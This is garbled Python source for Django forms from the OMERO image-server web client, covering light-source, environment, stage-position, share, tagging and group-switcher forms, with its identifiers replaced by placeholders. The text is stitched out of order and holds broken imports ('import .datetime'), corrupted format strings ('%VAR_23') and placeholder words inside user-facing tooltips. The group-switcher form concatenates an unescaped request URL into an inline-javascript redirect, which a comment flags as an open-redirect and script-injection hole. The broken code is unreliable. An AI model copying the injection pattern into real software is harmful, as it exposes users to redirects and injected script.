                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                required=False,
            )
            FUNC_1(self.fields["power"])
        # lstype (light-source type, choice field)
        try:
            if VAR_41.getLightSourceType() is not None:
                self.fields["lstype"] = MetadataModelChoiceField(
                    queryset=VAR_12["initial"]["lstypes"],
                    empty_label="Not set",
                    widget=forms.Select(
                        attrs={
                            "onchange": FUNC_0(
                                VAR_41.id, "type", VAR_7=True
                            )
                        }
                    ),
                    label="Type",
                    initial=VAR_41.getLightSourceType().value,
                    required=False,
                )
            else:
                self.fields["lstype"] = MetadataModelChoiceField(
                    queryset=VAR_12["initial"]["lstypes"],
                    empty_label="Not set",
                    widget=forms.Select(
                        attrs={
                            "onchange": FUNC_0(
                                VAR_41.id, "type", VAR_7=True
                            )
                        }
                    ),
                    label="Type",
                    required=False,
                )
            FUNC_1(self.fields["lstype"])
        except Exception:
            self.fields["lstype"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                label="Type",
                required=False,
            )
            FUNC_1(self.fields["lstype"])
        # pump: summarised as "<class>: <model>" text, always disabled
        try:
            VAR_45 = VAR_41.getPump()
            VAR_46 = VAR_45.OMERO_CLASS  # E.g. 'Arc'
            VAR_47 = VAR_45.getModel()
            VAR_48 = "%VAR_23: %s" % (VAR_46, VAR_47)
            self.fields["pump"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial=VAR_48,
                required=False,
            )
        except Exception:
            self.fields["pump"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                required=False,
            )
        FUNC_1(self.fields["pump"])
        # lmedium (laser medium, choice field)
        try:
            if VAR_41.getLaserMedium() is not None:
                self.fields["lmedium"] = MetadataModelChoiceField(
                    queryset=VAR_12["initial"]["mediums"],
                    empty_label="Not set",
                    widget=forms.Select(
                        attrs={
                            "onchange": FUNC_0(
                                VAR_41.id, "medium", VAR_7=True
                            )
                        }
                    ),
                    initial=VAR_41.getLaserMedium().value,
                    label="Medium",
                    required=False,
                )
            else:
                self.fields["lmedium"] = MetadataModelChoiceField(
                    queryset=VAR_12["initial"]["mediums"],
                    empty_label="Not set",
                    widget=forms.Select(
                        attrs={
                            "onchange": FUNC_0(
                                VAR_41.id, "medium", VAR_7=True
                            )
                        }
                    ),
                    label="Medium",
                    required=False,
                )
            FUNC_1(self.fields["lmedium"])
        except Exception:
            self.fields["lmedium"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                label="Medium",
                required=False,
            )
            FUNC_1(self.fields["lmedium"])
        # wavelength: prefer the per-channel settings value over the
        # light source's own wavelength
        try:
            if (
                VAR_42 is not None
                and VAR_42.wavelength is not None
            ):
                self.fields["wavelength"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": FUNC_0(VAR_41.id, "wavelength"),
                        }
                    ),
                    initial=VAR_42.wavelength.getValue(),
                    label=(
                        "Wavelength (%VAR_23)" % VAR_42.wavelength.getSymbol()
                    ),
                    required=False,
                )
            elif VAR_41.wavelength is not None:
                self.fields["wavelength"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": FUNC_0(VAR_41.id, "wavelength"),
                        }
                    ),
                    initial=VAR_41.wavelength.getValue(),
                    label=("Wavelength (%VAR_23)" % VAR_41.wavelength.getSymbol()),
                    required=False,
                )
            else:
                self.fields["wavelength"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": FUNC_0(VAR_41.id, "wavelength"),
                        }
                    ),
                    required=False,
                )
            FUNC_1(self.fields["wavelength"])
        except Exception:
            self.fields["wavelength"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                required=False,
            )
            FUNC_1(self.fields["wavelength"])
        # frequencyMultiplication
        try:
            if VAR_41.frequencyMultiplication is not None:
                self.fields["frequencyMultiplication"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": FUNC_0(
                                VAR_41.id, "frequencyMultiplication"
                            ),
                        }
                    ),
                    initial=VAR_41.frequencyMultiplication,
                    label="Frequency Multiplication",
                    required=False,
                )
            else:
                self.fields["frequencyMultiplication"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": FUNC_0(
                                VAR_41.id, "frequencyMultiplication"
                            ),
                        }
                    ),
                    label="Frequency Multiplication",
                    required=False,
                )
            FUNC_1(self.fields["frequencyMultiplication"])
        except Exception:
            self.fields["frequencyMultiplication"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                label="Frequency Multiplication",
                required=False,
            )
            FUNC_1(self.fields["frequencyMultiplication"])
        # tuneable (boolean choice)
        try:
            if VAR_41.tuneable is not None:
                self.fields["tuneable"] = forms.ChoiceField(
                    VAR_36=self.BOOLEAN_CHOICES,
                    widget=forms.Select(
                        attrs={
                            "onchange": FUNC_0(
                                VAR_41.id, "tuneable", VAR_7=True
                            )
                        }
                    ),
                    initial=VAR_41.tuneable,
                    required=False,
                )
            else:
                self.fields["tuneable"] = forms.ChoiceField(
                    VAR_36=self.BOOLEAN_CHOICES,
                    widget=forms.Select(
                        attrs={
                            "onchange": FUNC_0(
                                VAR_41.id, "tuneable", VAR_7=True
                            )
                        }
                    ),
                    required=False,
                )
            FUNC_1(self.fields["tuneable"])
        except Exception:
            self.fields["tuneable"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                required=False,
            )
            FUNC_1(self.fields["tuneable"])
        # pulse (choice field)
        try:
            if VAR_41.pulse is not None:
                self.fields["pulse"] = MetadataModelChoiceField(
                    queryset=VAR_12["initial"]["pulses"],
                    empty_label="Not set",
                    widget=forms.Select(
                        attrs={
                            "onchange": FUNC_0(
                                VAR_41.id, "pulse", VAR_7=True
                            )
                        }
                    ),
                    initial=VAR_41.pulse,
                    required=False,
                )
            else:
                self.fields["pulse"] = MetadataModelChoiceField(
                    queryset=VAR_12["initial"]["pulses"],
                    empty_label="Not set",
                    widget=forms.Select(
                        attrs={
                            "onchange": FUNC_0(
                                VAR_41.id, "pulse", VAR_7=True
                            )
                        }
                    ),
                    required=False,
                )
            FUNC_1(self.fields["pulse"])
        except Exception:
            self.fields["pulse"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                required=False,
            )
            FUNC_1(self.fields["pulse"])
        # repetitionRate (unit-carrying value)
        try:
            if VAR_41.repetitionRate is not None:
                self.fields["repetitionRate"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": FUNC_0(VAR_41.id, "repetitionRate"),
                        }
                    ),
                    initial=VAR_41.repetitionRate.getValue(),
                    label=(
                        "Repetition rate (%VAR_23)" % VAR_41.repetitionRate.getSymbol()
                    ),
                    required=False,
                )
            else:
                self.fields["repetitionRate"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": FUNC_0(VAR_41.id, "repetitionRate"),
                        }
                    ),
                    label="Repetition rate",
                    required=False,
                )
            FUNC_1(self.fields["repetitionRate"])
        except Exception:
            self.fields["repetitionRate"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                label="Repetition rate",
                required=False,
            )
            FUNC_1(self.fields["repetitionRate"])
        # pockelCell (boolean choice)
        try:
            if VAR_41.pockelCell is not None:
                self.fields["pockelCell"] = forms.ChoiceField(
                    VAR_36=self.BOOLEAN_CHOICES,
                    widget=forms.Select(
                        attrs={
                            "onchange": FUNC_0(
                                VAR_41.id, "pockelCell", VAR_7=True
                            )
                        }
                    ),
                    initial=VAR_41.pockelCell,
                    label="Pockel Cell",
                    required=False,
                )
            else:
                self.fields["pockelCell"] = forms.ChoiceField(
                    VAR_36=self.BOOLEAN_CHOICES,
                    widget=forms.Select(
                        attrs={
                            "onchange": FUNC_0(
                                VAR_41.id, "pockelCell", VAR_7=True
                            )
                        }
                    ),
                    label="Pockel Cell",
                    required=False,
                )
            FUNC_1(self.fields["pockelCell"])
        except Exception:
            self.fields["pockelCell"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                label="Pockel Cell",
                required=False,
            )
            FUNC_1(self.fields["pockelCell"])
        # attenuation comes from the settings object only (no try/except:
        # the condition itself guards the attribute access)
        if (
            VAR_42 is not None
            and VAR_42.attenuation is not None
        ):
            self.fields["attenuation"] = forms.CharField(
                max_length=100,
                widget=forms.TextInput(
                    attrs={
                        "size": 25,
                        "onchange": FUNC_0(
                            VAR_42.id, "attenuation"
                        ),
                    }
                ),
                initial=formatPercentFraction(VAR_42.attenuation),
                label="Attenuation (%)",
                required=False,
            )
        else:
            self.fields["attenuation"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                required=False,
            )
        FUNC_1(self.fields["attenuation"])
        # Fixed display order of the fields.
        self.fields.keyOrder = [
            "model",
            "manufacturer",
            "serialNumber",
            "lotNumber",
            "power",
            "lstype",
            "pump",
            "lmedium",
            "wavelength",
            "frequencyMultiplication",
            "tuneable",
            "pulse",
            "repetitionRate",
            "pockelCell",
            "attenuation",
        ]
class CLASS_21(forms.Form):
    """Read-only form presenting an image's imaging-environment metadata.

    Builds temperature / airPressure / humidity / co2percent fields from
    ``kwargs["initial"]["image"].getImagingEnvironment()``.  Each field is
    disabled via FUNC_1 and falls back to an "N/A" CharField if the value
    cannot be read.
    """

    def __init__(self, *VAR_11, **VAR_12):
        super(CLASS_21, self).__init__(*VAR_11, **VAR_12)
        VAR_43 = VAR_12["initial"]["image"].getImagingEnvironment()
        # temperature (unit-carrying; label embeds its symbol)
        try:
            if VAR_43.temperature is not None:
                self.fields["temperature"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": FUNC_0(
                                VAR_12["initial"]["image"].id, "temperature"
                            ),
                        }
                    ),
                    initial=VAR_43.temperature.getValue(),
                    label=("Temperature (%VAR_23)" % VAR_43.temperature.getSymbol()),
                    required=False,
                )
            else:
                self.fields["temperature"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": FUNC_0(
                                VAR_12["initial"]["image"].id, "temperature"
                            ),
                        }
                    ),
                    required=False,
                )
            FUNC_1(self.fields["temperature"])
        except Exception:
            self.fields["temperature"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                required=False,
            )
            FUNC_1(self.fields["temperature"])
        # airPressure (unit-carrying)
        try:
            if VAR_43.airPressure is not None:
                self.fields["airPressure"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": FUNC_0(
                                VAR_12["initial"]["image"].id, "airPressure"
                            ),
                        }
                    ),
                    initial=VAR_43.airPressure.getValue(),
                    label=("Air Pressure (%VAR_23)" % VAR_43.airPressure.getSymbol()),
                    required=False,
                )
            else:
                self.fields["airPressure"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": FUNC_0(
                                VAR_12["initial"]["image"].id, "airPressure"
                            ),
                        }
                    ),
                    label="Air Pressure",
                    required=False,
                )
            FUNC_1(self.fields["airPressure"])
        except Exception:
            self.fields["airPressure"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                label="Air Pressure",
                initial="N/A",
                required=False,
            )
            FUNC_1(self.fields["airPressure"])
        # humidity (plain value, no unit object)
        try:
            if VAR_43.humidity is not None:
                self.fields["humidity"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": FUNC_0(
                                VAR_12["initial"]["image"].id, "humidity"
                            ),
                        }
                    ),
                    initial=VAR_43.humidity,
                    required=False,
                )
            else:
                self.fields["humidity"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": FUNC_0(
                                VAR_12["initial"]["image"].id, "humidity"
                            ),
                        }
                    ),
                    required=False,
                )
            FUNC_1(self.fields["humidity"])
        except Exception:
            self.fields["humidity"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                required=False,
            )
            FUNC_1(self.fields["humidity"])
        # co2percent (plain value)
        try:
            if VAR_43.co2percent is not None:
                self.fields["co2percent"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": FUNC_0(
                                VAR_12["initial"]["image"].id, "co2percent"
                            ),
                        }
                    ),
                    initial=VAR_43.co2percent,
                    label="CO2 (%)",
                    required=False,
                )
            else:
                self.fields["co2percent"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": FUNC_0(
                                VAR_12["initial"]["image"].id, "co2percent"
                            ),
                        }
                    ),
                    label="CO2 (%)",
                    required=False,
                )
            FUNC_1(self.fields["co2percent"])
        except Exception:
            self.fields["co2percent"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                label="CO2 (%)",
                required=False,
            )
            FUNC_1(self.fields["co2percent"])
        # Fixed display order of the fields.
        self.fields.keyOrder = ["airPressure", "co2percent", "humidity", "temperature"]
class CLASS_22(forms.Form):
    """Read-only form presenting an image's stage-label position (X/Y/Z).

    Each axis field is built from ``kwargs["initial"]["image"]``'s stage
    label and disabled via FUNC_1; if the value cannot be read the field
    falls back to a disabled "N/A" CharField.

    Bug fix vs. the previous version: the ``positiony`` fallback branch
    used to disable ``positionx`` instead of ``positiony`` (copy-paste
    error), leaving the N/A positiony field enabled.
    """

    def __init__(self, *VAR_11, **VAR_12):
        super(CLASS_22, self).__init__(*VAR_11, **VAR_12)
        img = VAR_12["initial"]["image"]
        # The three axis fields follow an identical pattern; build them
        # with a single helper so each one is guaranteed to be disabled.
        self._add_position_field("positionx", "Position X", img)
        self._add_position_field("positiony", "Position Y", img)
        self._add_position_field("positionz", "Position Z", img)
        self.fields.keyOrder = ["positionx", "positiony", "positionz"]

    def _add_position_field(self, name, label, img):
        """Add one disabled stage-position CharField for axis `name`.

        `name` is both the form-field key and the stage-label attribute
        ("positionx" / "positiony" / "positionz"); `label` is the
        user-visible label.  Falls back to "N/A" on any read error.
        """
        try:
            stage_label = img.getStageLabel()
            if stage_label is not None:
                self.fields[name] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": FUNC_0(img.id, name),
                        }
                    ),
                    initial=getattr(stage_label, name),
                    label=label,
                    required=False,
                )
            else:
                self.fields[name] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": FUNC_0(img.id, name),
                        }
                    ),
                    label=label,
                    required=False,
                )
            FUNC_1(self.fields[name])
        except Exception:
            self.fields[name] = forms.CharField(
                max_length=100,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                label=label,
                required=False,
            )
            FUNC_1(self.fields[name])
|
import .datetime
import time
import logging
from django.conf import .settings
from django import forms
from django.forms.formsets import formset_factory
from django.core.urlresolvers import reverse
from omeroweb.custom_forms import NonASCIIForm
from .custom_forms import MetadataModelChoiceField
from .custom_forms import AnnotationModelMultipleChoiceField
from .custom_forms import ObjectModelMultipleChoiceField
from omeroweb.webadmin.custom_forms import ExperimenterModelMultipleChoiceField
from omeroweb.webadmin.custom_forms import GroupModelChoiceField
from omeroweb.webclient.webclient_utils import formatPercentFraction
# Module-level logger for this forms module.
VAR_0 = logging.getLogger(__name__)
# URL of the "help" icon served from the static files tree.
VAR_1 = "%swebgateway/img/help16.png" % settings.STATIC_URL
# Tooltip markup shown next to the share "enable" checkbox.
VAR_2 = (
    '<span class="tooltip" title="Enable/Disable: This option'
    ' allows the VAR_17 to keep the access control of the share.">'
    '<img src="%s" /></span>'
) % VAR_1
# Tooltip markup explaining the expected share expiry-date format.
VAR_3 = (
    '<span class="tooltip" title="Expiry VAR_49: This VAR_49 defines'
    " when the share will stop being available. Date format:"
    ' YYYY-MM-DD."><img src="%s" /></span>'
) % VAR_1
class CLASS_0(NonASCIIForm):
    """Minimal one-field form holding a short text value (25-char input)."""

    VAR_10 = forms.CharField(widget=forms.TextInput(attrs={"size": 25}))
class CLASS_1(NonASCIIForm):
    """Share-creation form: message, expiry date, enable flag and members.

    ``kwargs["initial"]`` must provide ``experimenters`` (queryset) and may
    provide ``shareMembers`` (pre-selected members); any error while reading
    the pre-selection falls back to a member list with no initial selection.
    """

    def __init__(self, *VAR_11, **VAR_12):
        super(CLASS_1, self).__init__(*VAR_11, **VAR_12)
        try:
            # Probe the key first; a missing/falsy value drops to except
            # or skips the initial selection.
            if VAR_12["initial"]["shareMembers"]:
                pass
            self.fields["members"] = ExperimenterModelMultipleChoiceField(
                queryset=VAR_12["initial"]["experimenters"],
                initial=VAR_12["initial"]["shareMembers"],
                widget=forms.SelectMultiple(attrs={"size": 28}),
            )
        except Exception:
            self.fields["members"] = ExperimenterModelMultipleChoiceField(
                queryset=VAR_12["initial"]["experimenters"],
                widget=forms.SelectMultiple(attrs={"size": 28}),
            )
        self.fields.keyOrder = [
            "message",
            "expiration",
            "enable",
            "members",
        ]  # , 'guests']

    VAR_13 = forms.CharField(widget=forms.Textarea(attrs={"rows": 5, "cols": 50}))
    VAR_14 = forms.CharField(
        max_length=100,
        widget=forms.TextInput(attrs={"size": 10}),
        label="Expiry date",
        help_text=VAR_3,
        required=False,
    )
    VAR_15 = forms.BooleanField(required=False, help_text=VAR_2)

    def FUNC_2(self):
        """Validate the expiry date: YYYY-MM-DD format and in the future.

        Returns None for an empty string, the raw cleaned value otherwise;
        raises forms.ValidationError on bad format or a past date.
        """
        if (
            self.cleaned_data["expiration"] is not None
            and len(self.cleaned_data["expiration"]) < 1
        ):
            return None
        if self.cleaned_data["expiration"] is not None:
            VAR_44 = str(self.cleaned_data["expiration"]).rsplit("-")
            try:
                VAR_49 = datetime.datetime.strptime(
                    ("%VAR_23-%s-%s" % (VAR_44[0], VAR_44[1], VAR_44[2])), "%Y-%m-%d"
                )
            except Exception:
                raise forms.ValidationError("Date is in the wrong format. YY-MM-DD")
            if time.mktime(VAR_49.timetuple()) <= time.time():
                raise forms.ValidationError("Expiry VAR_49 must be in the future.")
        return self.cleaned_data["expiration"]
class CLASS_2(NonASCIIForm):
    """Name + optional description form, with a hidden extra field."""

    VAR_6 = forms.CharField(max_length=250, widget=forms.TextInput(attrs={"size": 45}))
    VAR_16 = forms.CharField(
        widget=forms.Textarea(attrs={"rows": 2, "cols": 49}), required=False
    )
    VAR_17 = forms.CharField(widget=forms.HiddenInput, required=False)
class CLASS_3(NonASCIIForm):
    """Form with a single required name field."""

    VAR_6 = forms.CharField(max_length=250, widget=forms.TextInput(attrs={"size": 45}))
class CLASS_4(NonASCIIForm):
    """Form with a single optional description textarea."""

    VAR_16 = forms.CharField(
        widget=forms.Textarea(attrs={"rows": 3, "cols": 39}), required=False
    )
class CLASS_5(NonASCIIForm):
    """Multi-select form listing every object type present in ``initial``.

    For each object type (images, datasets, projects, screens, plates,
    acquisitions, wells, shares) found non-empty in ``kwargs["initial"]``,
    a SelectMultiple field is added.  If ``initial["selected"][<key>]`` is
    available it pre-selects those ids; otherwise the field is added with
    no initial selection.

    Refactor: the previous version repeated the same try/except field
    construction eight times; it is now table-driven via
    ``_add_object_field`` with identical behavior and field order.
    """

    # (form-field name, key used in initial/ and initial["selected"]/),
    # in the order the fields are added.
    _OBJECT_TYPES = (
        ("image", "images"),
        ("dataset", "datasets"),
        ("project", "projects"),
        ("screen", "screens"),
        ("plate", "plates"),
        ("acquisition", "acquisitions"),
        ("well", "wells"),
        ("share", "shares"),
    )

    def __init__(self, *VAR_11, **VAR_12):
        super(CLASS_5, self).__init__(*VAR_11, **VAR_12)
        for field_name, key in self._OBJECT_TYPES:
            self._add_object_field(field_name, key, VAR_12["initial"])

    def _add_object_field(self, field_name, key, initial):
        """Add one multi-select field when ``initial[key]`` is non-empty."""
        objects = key in initial and initial[key] or list()
        if len(objects) > 0:
            try:
                self.fields[field_name] = ObjectModelMultipleChoiceField(
                    queryset=objects,
                    initial=initial["selected"][key],
                    widget=forms.SelectMultiple(attrs={"size": 10}),
                    required=False,
                )
            except Exception:
                # No usable pre-selection supplied; add the field without it.
                self.fields[field_name] = ObjectModelMultipleChoiceField(
                    queryset=objects,
                    widget=forms.SelectMultiple(attrs={"size": 10}),
                    required=False,
                )
class CLASS_6(CLASS_5):
    """CLASS_5 variant adding a hidden comma-separated tag-id field.

    Bug fixes vs. the previous version (Python 3):
    * ``map(int, ...)`` is lazy in Python 3, so invalid ids never raised
      inside the ``try`` and a one-shot iterator was returned; the list
      comprehension evaluates eagerly and returns a real list.
    * ``forms.ValidationError()`` was called without the required message
      argument, which itself raises ``TypeError``; a message is supplied.
    """

    def __init__(self, *VAR_11, **VAR_12):
        super(CLASS_6, self).__init__(*VAR_11, **VAR_12)

    VAR_18 = forms.CharField(required=False, widget=forms.HiddenInput)

    def FUNC_3(self):
        """Parse the hidden tags field into a list of integer ids."""
        VAR_33 = self.cleaned_data["tags"]
        if not VAR_33:
            return []
        try:
            VAR_33 = [int(tag_id) for tag_id in VAR_33.split(",")]
        except Exception:
            raise forms.ValidationError(
                "Tags must be a comma-separated list of integer ids."
            )
        return VAR_33
class CLASS_7(forms.Form):
    """Hidden-input form used as a row of the formset VAR_4 below."""

    VAR_19 = forms.CharField(required=True, widget=forms.HiddenInput)
    VAR_16 = forms.CharField(required=False, widget=forms.HiddenInput)
    VAR_20 = forms.IntegerField(min_value=1, required=False, widget=forms.HiddenInput)
# Formset over CLASS_7 rows; extra=0 so only submitted data creates forms.
VAR_4 = formset_factory(CLASS_7, extra=0)
class CLASS_8(CLASS_5):
    """CLASS_5 variant adding existing-file selection and a file upload.

    ``kwargs["initial"]["files"]`` supplies the queryset of existing
    annotation files shown in the multi-select.
    """

    def __init__(self, *VAR_11, **VAR_12):
        super(CLASS_8, self).__init__(*VAR_11, **VAR_12)
        self.fields["files"] = AnnotationModelMultipleChoiceField(
            queryset=VAR_12["initial"]["files"],
            widget=forms.SelectMultiple(attrs={"size": 8, "class": "existing"}),
            required=False,
        )

    # New file to upload (optional).
    VAR_21 = forms.FileField(required=False)
class CLASS_9(CLASS_5):
    """CLASS_5 variant adding a required comment textarea."""

    VAR_22 = forms.CharField(widget=forms.Textarea(attrs={"rows": 2, "cols": 39}))
class CLASS_10(forms.Form):
    """Group-switcher form: a select whose onchange redirects the browser
    to the change_active_group view, optionally carrying a return ``url``.

    NOTE(security): ``kwargs["initial"]["url"]`` is concatenated unescaped
    into an inline-javascript ``window.location.href`` redirect.  If that
    value can be influenced by the request, this is an open-redirect /
    script-injection vector (CWE-601); the value should be validated as a
    safe local URL before being passed in here — confirm at the call site.
    """

    def __init__(self, *VAR_11, **VAR_12):
        super(CLASS_10, self).__init__(*VAR_11, **VAR_12)
        try:
            # Variant with a "?url=..." return target; falls back below if
            # "url" is missing from the initial data.
            self.fields["active_group"] = GroupModelChoiceField(
                queryset=VAR_12["initial"]["mygroups"],
                initial=VAR_12["initial"]["activeGroup"],
                empty_label=None,
                widget=forms.Select(
                    attrs={
                        "onchange": (
                            "window.location.href='"
                            + reverse(viewname="change_active_group")
                            + "?url="
                            + VAR_12["initial"]["url"]
                            + "&active_group='"
                            "+this.options[this.selectedIndex].value"
                        )
                    }
                ),
            )
        except Exception:
            self.fields["active_group"] = GroupModelChoiceField(
                queryset=VAR_12["initial"]["mygroups"],
                initial=VAR_12["initial"]["activeGroup"],
                empty_label=None,
                widget=forms.Select(
                    attrs={
                        "onchange": (
                            "window.location.href='"
                            + reverse(viewname="change_active_group")
                            + "?active_group='"
                            "+this.options[this.selectedIndex].value"
                        )
                    }
                ),
            )
        self.fields.keyOrder = ["active_group"]
class CLASS_11(forms.Form):
    """Drop-down for picking a field index within an inclusive range.

    ``kwargs["initial"]["range"]`` supplies (first, last); options are
    labelled Field#1..Field#N and trigger the javascript ``changeField``
    handler on change.
    """

    def __init__(self, *args, **kwargs):
        super(CLASS_11, self).__init__(*args, **kwargs)
        first, last = kwargs["initial"]["range"]
        # Build one (value, label) pair per index; labels restart at 1.
        options = []
        for offset, idx in enumerate(range(first, last + 1)):
            options.append((str(idx), "Field#%i" % (offset + 1)))
        self.fields["index"] = forms.ChoiceField(
            VAR_36=tuple(options),
            widget=forms.Select(
                attrs={
                    "onchange": ("changeField(this.options[this.selectedIndex].value);")
                }
            ),
        )
        self.fields.keyOrder = ["index"]
def FUNC_0(VAR_5, VAR_6, VAR_7=False):
    """Build the inline-javascript onchange handler for a metadata field.

    VAR_5 -- id of the object being edited (interpolated via str()).
    VAR_6 -- field name, single-quoted in the output.
    VAR_7 -- when True the handler reads the selected <option> value
             (for <select> widgets) instead of the input's value.
    """
    if VAR_7:
        value_expr = "this.options[this.selectedIndex].value);"
    else:
        value_expr = "this.value);"
    return "javascript:FUNC_0(%s, '%s', %s" % (VAR_5, VAR_6, value_expr)
def FUNC_1(VAR_8, VAR_9=True):
    """Disable a form field's widget in-place.

    Always sets the widget's ``disabled`` attribute; when VAR_9 is True
    (the default) also tags it with the ``disabled-metadata`` CSS class.
    """
    attrs = VAR_8.widget.attrs
    attrs["disabled"] = True
    if not VAR_9:
        return
    attrs["class"] = "disabled-metadata"
class CLASS_12(forms.Form):
    """Read-only form presenting a logical channel's metadata.

    Fields are built from ``kwargs["initial"]["logicalChannel"]`` (plus
    ``exWave`` / ``emWave`` unit objects and several choice querysets in
    ``initial``).  Every field follows the same pattern: build with the
    real value as ``initial`` when available, otherwise without; fall back
    to an "N/A" CharField on any read error; then disable via FUNC_1
    (some fields pass VAR_9=False to skip the CSS class).
    """

    def __init__(self, *VAR_11, **VAR_12):
        super(CLASS_12, self).__init__(*VAR_11, **VAR_12)
        VAR_37 = VAR_12["initial"]["logicalChannel"]
        # name
        try:
            if VAR_37 is not None:
                self.fields["name"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={"size": 25, "onchange": FUNC_0(VAR_37.id)}
                    ),
                    initial=VAR_37.name,
                    required=False,
                )
            else:
                self.fields["name"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": FUNC_0(VAR_37.id, "name"),
                        }
                    ),
                    required=False,
                )
            FUNC_1(self.fields["name"])
        except Exception:
            self.fields["name"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                required=False,
            )
            FUNC_1(self.fields["name"])
        # excitationWave: value/symbol come from initial["exWave"]
        try:
            if VAR_37 is not None:
                self.fields["excitationWave"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": FUNC_0(VAR_37.id, "name"),
                        }
                    ),
                    initial=VAR_12["initial"]["exWave"].getValue(),
                    label=("Excitation (%VAR_23)" % VAR_12["initial"]["exWave"].getSymbol()),
                    required=False,
                )
            else:
                self.fields["excitationWave"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": FUNC_0(VAR_37.id, "name"),
                        }
                    ),
                    label="Excitation",
                    required=False,
                )
            FUNC_1(self.fields["excitationWave"])
        except Exception:
            self.fields["excitationWave"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                label="Excitation",
                required=False,
            )
            FUNC_1(self.fields["excitationWave"])
        # emissionWave: value/symbol come from initial["emWave"]
        try:
            if VAR_37 is not None:
                self.fields["emissionWave"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": FUNC_0(VAR_37.id, "name"),
                        }
                    ),
                    initial=VAR_12["initial"]["emWave"].getValue(),
                    label=("Emission (%VAR_23)" % VAR_12["initial"]["emWave"].getSymbol()),
                    required=False,
                )
            else:
                self.fields["emissionWave"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": FUNC_0(VAR_37.id, "name"),
                        }
                    ),
                    label="Emission",
                    required=False,
                )
            FUNC_1(self.fields["emissionWave"])
        except Exception:
            self.fields["emissionWave"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                label="Emission",
                required=False,
            )
            FUNC_1(self.fields["emissionWave"])
        # ndFilter (percent fraction; FUNC_1 called without the CSS class)
        try:
            if VAR_37 is not None and VAR_37.ndFilter is not None:
                self.fields["ndFilter"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": FUNC_0(VAR_37.id, "name"),
                        }
                    ),
                    initial=formatPercentFraction(VAR_37.ndFilter),
                    label="ND filter (%)",
                    required=False,
                )
            else:
                self.fields["ndFilter"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": FUNC_0(VAR_37.id, "name"),
                        }
                    ),
                    label="ND filter (%)",
                    required=False,
                )
            FUNC_1(self.fields["ndFilter"], VAR_9=False)
        except Exception:
            self.fields["ndFilter"] = forms.CharField(
